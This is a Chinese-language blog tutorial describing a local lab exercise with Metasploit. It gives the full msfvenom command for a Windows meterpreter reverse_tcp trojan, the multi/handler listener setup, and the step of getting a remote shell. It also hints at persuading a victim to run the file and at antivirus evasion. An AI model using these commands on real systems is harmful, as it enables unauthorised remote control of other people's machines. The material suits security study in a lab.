前段時間學了msf的一些基礎知識,正好有時間了,在本地搭建好了環境,準備練練手。(Tips:請勿用作非法用途,僅供學術交流)
MSF介紹
Metasploit Framework (MSF)是2003 年以開放源代碼方式發佈、可自由獲取的開發框架,這個環境為滲透測試、shellcode 編寫和漏洞研究提供了一個可靠的平臺。它集成了各平臺上常見的溢出漏洞和流行的shellcode,並且不斷更新,最新版本的MSF 包含了180多種當前流行的操作系統和應用軟件的exploit,以及100多 個shellcode。作為安全工具,它在安全檢測中起到不容忽視的作用,併為漏洞自動化探測和及時檢測系統漏洞提供有力的保障。
配置環境
<code>kali:192.168.83.128 靶機:192.168.83.129/<code>
step1-生成木馬
今天需要使用到msfvenom來生成木馬。
基礎用法作用-p, --payload使用攻擊負荷。指定一個’-'或者輸入(stdin)用戶自定義的payloads(攻擊負荷)。-f, --format輸出格式(使用 --help-formats來查看變量格式列表)-o,–out保存攻擊負荷(payload)
在此次實驗中命令為:
<code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.83.128 LPORT=4444 -f exe -o payload.exe/<code>
這裡的LHOST為kali的IP,LPORT自然為kali的端口。
ok,生成成功。
step2-將木馬傳入到靶機
這一步就要靠自己的技巧了,而在這裡我是在本地進行試驗
(ps:自行試驗時目標主機必須得關閉安全防護比如防火牆,360等等,如果沒關,則需要對木馬進行免殺處理,木馬才能成功運行)
step3-使用msf偵聽
<code>use exploit/mulit/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.83.128 //kali的ipset LPORT 4444 //kali的端口run/<code>
step4-運行木馬
這一步是通過你自己的技術,使對方運行你的木馬,由於我是在本地試驗,就不贅述了。
step5-獲取shell
當對方成功運行木馬之後,就會反彈一個shell。
在meterpreter後輸入shell即可獲取目標靶機的一個shell
(類似於cmd,可以執行系統命令)
相信看到這裡,大家應該心中都有了答案,入侵一個系統確實不難,所以咱們得把技術用到正地方,而不是想著如何入侵別人的系統,本文也僅供學術交流,大家千萬不要在真實環境試驗,可以的話,自行搭建本地環境,鍛鍊一下自己的技術,本文實現起來不算很難,最後的最後,感謝支持!